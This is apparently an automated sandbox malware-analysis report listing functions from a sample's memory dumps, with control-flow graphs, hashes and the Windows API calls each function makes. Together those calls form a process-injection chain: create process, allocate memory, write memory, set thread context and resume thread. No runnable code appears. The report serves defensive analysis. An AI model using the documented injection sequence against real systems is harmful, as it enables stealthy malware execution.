                  control_flow_graph 93 2796df7-2796e92 95 2796e94-2796eb9 93->95 96 2796ee6-2796f06 93->96 95->96 99 2796ebb-2796ebd 95->99 100 2796f08-2796f2d 96->100 101 2796f5a-2796f8b 96->101 102 2796ebf-2796ec9 99->102 103 2796ee0-2796ee3 99->103 100->101 111 2796f2f-2796f31 100->111 109 2796f8d-2796fb5 101->109 110 2796fe2-279709d CreateProcessA 101->110 104 2796ecb 102->104 105 2796ecd-2796edc 102->105 103->96 104->105 105->105 108 2796ede 105->108 108->103 109->110 119 2796fb7-2796fb9 109->119 127 279709f-27970a5 110->127 128 27970a6-279712c 110->128 112 2796f33-2796f3d 111->112 113 2796f54-2796f57 111->113 116 2796f3f 112->116 117 2796f41-2796f50 112->117 113->101 116->117 117->117 118 2796f52 117->118 118->113 121 2796fbb-2796fc5 119->121 122 2796fdc-2796fdf 119->122 123 2796fc9-2796fd8 121->123 124 2796fc7 121->124 122->110 123->123 126 2796fda 123->126 124->123 126->122 127->128 138 279713c-2797140 128->138 139 279712e-2797132 128->139 141 2797150-2797154 138->141 142 2797142-2797146 138->142 139->138 140 2797134-2797137 call 2790394 139->140 140->138 145 2797164-2797168 141->145 146 2797156-279715a 141->146 142->141 144 2797148-279714b call 2790394 142->144 144->141 149 279717a-2797181 145->149 150 279716a-2797170 145->150 146->145 148 279715c-279715f call 2790394 146->148 148->145 151 2797198 149->151 152 2797183-2797192 149->152 150->149 155 2797199 151->155 152->151 155->155
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0279708A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 994bb2d4441b283e3775e74e7e4924cac467dc43c511a47568f8e971fd834823
                  • Instruction ID: f1c9d5b414fea34bf2255cc96c98523cf06bb17bfd1450d570623159cab55ca4
                  • Opcode Fuzzy Hash: 994bb2d4441b283e3775e74e7e4924cac467dc43c511a47568f8e971fd834823
                  • Instruction Fuzzy Hash: 31A15A71E00319CFEF24CFA8D841BEDBBB6BB48314F108569E808A7294DB759985CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02796E00 Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 156 2796e00-2796e92 158 2796e94-2796eb9 156->158 159 2796ee6-2796f06 156->159 158->159 162 2796ebb-2796ebd 158->162 163 2796f08-2796f2d 159->163 164 2796f5a-2796f8b 159->164 165 2796ebf-2796ec9 162->165 166 2796ee0-2796ee3 162->166 163->164 174 2796f2f-2796f31 163->174 172 2796f8d-2796fb5 164->172 173 2796fe2-279709d CreateProcessA 164->173 167 2796ecb 165->167 168 2796ecd-2796edc 165->168 166->159 167->168 168->168 171 2796ede 168->171 171->166 172->173 182 2796fb7-2796fb9 172->182 190 279709f-27970a5 173->190 191 27970a6-279712c 173->191 175 2796f33-2796f3d 174->175 176 2796f54-2796f57 174->176 179 2796f3f 175->179 180 2796f41-2796f50 175->180 176->164 179->180 180->180 181 2796f52 180->181 181->176 184 2796fbb-2796fc5 182->184 185 2796fdc-2796fdf 182->185 186 2796fc9-2796fd8 184->186 187 2796fc7 184->187 185->173 186->186 189 2796fda 186->189 187->186 189->185 190->191 201 279713c-2797140 191->201 202 279712e-2797132 191->202 204 2797150-2797154 201->204 205 2797142-2797146 201->205 202->201 203 2797134-2797137 call 2790394 202->203 203->201 208 2797164-2797168 204->208 209 2797156-279715a 204->209 205->204 207 2797148-279714b call 2790394 205->207 207->204 212 279717a-2797181 208->212 213 279716a-2797170 208->213 209->208 211 279715c-279715f call 2790394 209->211 211->208 214 2797198 212->214 215 2797183-2797192 212->215 213->212 218 2797199 214->218 215->214 218->218
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0279708A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 7166469966c692bf0e053d96435d00e92c1876ad42d7a2570765b61983c3857a
                  • Instruction ID: fb1766c0dbca5cfb2783c14abf5e56a433575f91fd1db8a179f60c47bfedef5f
                  • Opcode Fuzzy Hash: 7166469966c692bf0e053d96435d00e92c1876ad42d7a2570765b61983c3857a
                  • Instruction Fuzzy Hash: B4A15A71E00319CFEF24CFA8D841BEDBBB6BB48314F108569E808A7294DB759985CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02797539 Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 2797539-279753c 315 279753f-27975bb VirtualAllocEx 314->315 316 27974c0-27974fa 314->316 321 27975bd-27975c3 315->321 322 27975c4-27975e9 315->322 325 27974fc-2797502 316->325 326 2797503-2797528 316->326 321->322 325->326
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 21721aea9458eea926d6066b1892ec47ac3278c64e25be320860197884d461b0
                  • Instruction ID: d21126072d4ee02f8a5451cfeb8e1f30d1ba1aae4f820b3156a21387bd971b7e
                  • Opcode Fuzzy Hash: 21721aea9458eea926d6066b1892ec47ac3278c64e25be320860197884d461b0
                  • Instruction Fuzzy Hash: 3C315771D003098FDF24DFA9D845BEEFBF1AF88314F248419E559A7250CB399945CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02797390 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 332 2797390-27973e6 334 27973e8-27973f4 332->334 335 27973f6-2797435 WriteProcessMemory 332->335 334->335 337 279743e-279746e 335->337 338 2797437-279743d 335->338 338->337
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02797428
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 7ce224a18d6ec8859ad26c5ff7b89761406678917bfe7fd46ea1917766a55f42
                  • Instruction ID: 836106676c93c83c84795b41733e24feef1c89b73ee8e40e1d5fde6be180e30c
                  • Opcode Fuzzy Hash: 7ce224a18d6ec8859ad26c5ff7b89761406678917bfe7fd46ea1917766a55f42
                  • Instruction Fuzzy Hash: B22120B5D003499FDF10CFA9C981BEEBBB1BF48310F50842AE968A7240D7789941CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02797398 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 342 2797398-27973e6 344 27973e8-27973f4 342->344 345 27973f6-2797435 WriteProcessMemory 342->345 344->345 347 279743e-279746e 345->347 348 2797437-279743d 345->348 348->347
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02797428
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: f9006412c147afac0749253ed3998cb8b839f9b9d2f934447d5992188c8271ad
                  • Instruction ID: be44be3e5ad3a1988014ed333d9e0b1aa30917bdb19e1fa3c796aeb65f67f74b
                  • Opcode Fuzzy Hash: f9006412c147afac0749253ed3998cb8b839f9b9d2f934447d5992188c8271ad
                  • Instruction Fuzzy Hash: EB2130B1D003499FDF10CFAAC881BEEBBF5FB48310F50842AE918A7240D7789941CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 027971E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 362 27971e0-279722b 364 279723b-279726b Wow64SetThreadContext 362->364 365 279722d-2797239 362->365 367 279726d-2797273 364->367 368 2797274-27972a4 364->368 365->364 367->368
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0279725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 592325227b95123fd78dfa5ce30ac2e5319a38b30da4d5c96b32cf6f88c5b5ad
                  • Instruction ID: af060e7e5c53ee5ff2b3b82815650d3d9e46c98ee788b9ceeb4d20d0c5fb0621
                  • Opcode Fuzzy Hash: 592325227b95123fd78dfa5ce30ac2e5319a38b30da4d5c96b32cf6f88c5b5ad
                  • Instruction Fuzzy Hash: 4A2137B1D103098FDB14DFAAC485BAEBBF4EB48314F54842AE519A7240DB789945CFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 027971DB Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 352 27971db-279722b 354 279723b-279726b Wow64SetThreadContext 352->354 355 279722d-2797239 352->355 357 279726d-2797273 354->357 358 2797274-27972a4 354->358 355->354 357->358
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0279725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 6e2d919a83df662467f5c72c9f1e19347287bf371be605080f0451d4ca45c369
                  • Instruction ID: 253475f5beba6a497abcc3025692494a06e75a6d526d9f6c22e177807ab9f423
                  • Opcode Fuzzy Hash: 6e2d919a83df662467f5c72c9f1e19347287bf371be605080f0451d4ca45c369
                  • Instruction Fuzzy Hash: 132157B1D103098FDB14CFA9C5817EEBBF4AF48314F50842AE419A7240CB389945CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02797540 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 372 2797540-27975bb VirtualAllocEx 375 27975bd-27975c3 372->375 376 27975c4-27975e9 372->376 375->376
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 723534d4020428297beed3bcfbd258cd443a126b52e16131f4be8d6ac61efc7f
                  • Instruction ID: 6da68d8c54f9e25f868652fe51b3213bfc3cdaca0841e91c81cccfacf5bcd5a2
                  • Opcode Fuzzy Hash: 723534d4020428297beed3bcfbd258cd443a126b52e16131f4be8d6ac61efc7f
                  • Instruction Fuzzy Hash: 17115371C003499FDB20DFAAC845BEEBBF5EB48320F148419E919A7250CB35A901CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02797A00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 380 2797a00-2797a6f ResumeThread 383 2797a78-2797a9d 380->383 384 2797a71-2797a77 380->384 384->383
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: c7f73235ca4949367e62d76ccad1b066b552b31e57a983bffff805e7fae826f0
                  • Instruction ID: 012ef6bd26a571b03a32870345222258d10a519d24575d788c6b90add26bb7f2
                  • Opcode Fuzzy Hash: c7f73235ca4949367e62d76ccad1b066b552b31e57a983bffff805e7fae826f0
                  • Instruction Fuzzy Hash: 401128B1D003498FDB24DFAAD8457AEFBF5EB48224F148419D519A7240CB75A941CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D428 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee90df06094ab18ce4afafcf326496f3464791b471b8595804b9cd6b50ec099b
                  • Instruction ID: 5aadfb329c110ce318ab0a6351013a8d866ec3294aecfffaa9fc18fcd0a25208
                  • Opcode Fuzzy Hash: ee90df06094ab18ce4afafcf326496f3464791b471b8595804b9cd6b50ec099b
                  • Instruction Fuzzy Hash: C121007A604240EFDB15DF10D9C0B26BB65FBD8324F20C5A9E9090A256C336E856CAA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D514 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ad84a76fe9696ef9e6f5c5c62cfe923debe4d7fc433aab856f8c9f11dd80b8e
                  • Instruction ID: 0fb0f25015b989749baa093a92c98784d2fe4bc38b43516a5d23b09ed9330e86
                  • Opcode Fuzzy Hash: 7ad84a76fe9696ef9e6f5c5c62cfe923debe4d7fc433aab856f8c9f11dd80b8e
                  • Instruction Fuzzy Hash: 712103B9604240DFDB14DF14D9C0B26BF75FBD8328F24C569E8094F256C736D856CAA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D423 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: fedf922baabcb1a71e8de1bb661955bb00d996a0a37ea94401966fa0337ceacd
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 5211D376504280DFCB16CF14D5C4B16BF72FB94324F24C5A9D8490B656C336D856CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D50F Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: ae7bb8c51d4f572fabc6481d265af3a3ed64159dd70bbe9e89af0de245c0e7e9
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 4811E676504280CFCB15CF14D5C4B16BF72FB94328F24C5ADD8494B656C336D856CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D795 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 36017136dd3f44b245acdcc08d805c8a3108f7bc5ee388d59be4ad69836feaef
                  • Instruction ID: 6ddba5881f0cf5f77147a112f170560df764297de6838c8db6ea353ffed895ed
                  • Opcode Fuzzy Hash: 36017136dd3f44b245acdcc08d805c8a3108f7bc5ee388d59be4ad69836feaef
                  • Instruction Fuzzy Hash: 8001A2755083449AE7208B25DC84B66BBA8DF91725F18C45AED190B282C6799845CAB2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A4D794 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1313057276.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a4d000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e9d8dd20eea56b7402eecc2cb3398b1148cdbfd91705d073a3a07493b5f642b9
                  • Instruction ID: 1df031fa5a71c84c923e92913f82efde0ce6b4d53c403d4a3de1fbb1183b0be6
                  • Opcode Fuzzy Hash: e9d8dd20eea56b7402eecc2cb3398b1148cdbfd91705d073a3a07493b5f642b9
                  • Instruction Fuzzy Hash: 5EF06D75404344AEEB208F1ADC88B62FF98EB91734F18C55EED085B286C379AC45CBB1
                  Uniqueness

                  Uniqueness Score: -1.00%